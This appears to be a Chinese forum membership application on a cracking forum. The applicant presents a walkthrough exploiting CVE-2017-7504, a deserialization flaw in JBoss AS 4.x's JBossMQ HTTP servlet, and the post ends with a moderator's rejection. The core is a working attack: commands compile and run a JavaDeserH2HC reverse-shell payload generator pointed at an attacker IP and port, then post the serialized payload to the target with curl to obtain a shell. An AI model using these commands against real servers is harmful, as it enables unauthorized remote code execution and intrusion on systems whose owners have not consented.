申请ID:dudu9595
申请会员ID为:dudu9595邮箱:dudu9595@yahoo.com
JBOSSMQ JMS CVE-2017-7504 集群反序列化漏洞 4.X0x01漏洞描述
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码。
0x02影响版本JBoss AS 4.x及之前版本0x03漏洞利用1、首先验证目标jboss是否存在此漏洞,直接访问
/jbossmq-httpil/HTTPServerILServlet 路径下。若访问200或下载,则可能存在漏洞。此处我们使用JavaDeserH2HC工具来利用该漏洞,尝试直接弹回一个shell
注意:这个工具在linux系统使用
[*]javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
[*]java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 反弹的IP:端口
[*]curl http://目标IP:8080/jbossmq-httpil/HTTPServerILServlet/ --data-binary @ReverseShellCommonsCollectionsHashMap.ser
端口监听:
反弹shell成功
抱歉,未能达到申请要求,申请不通过,可以关注论坛官方微信(吾爱破解论坛),等待开放注册通知。
页:
[1]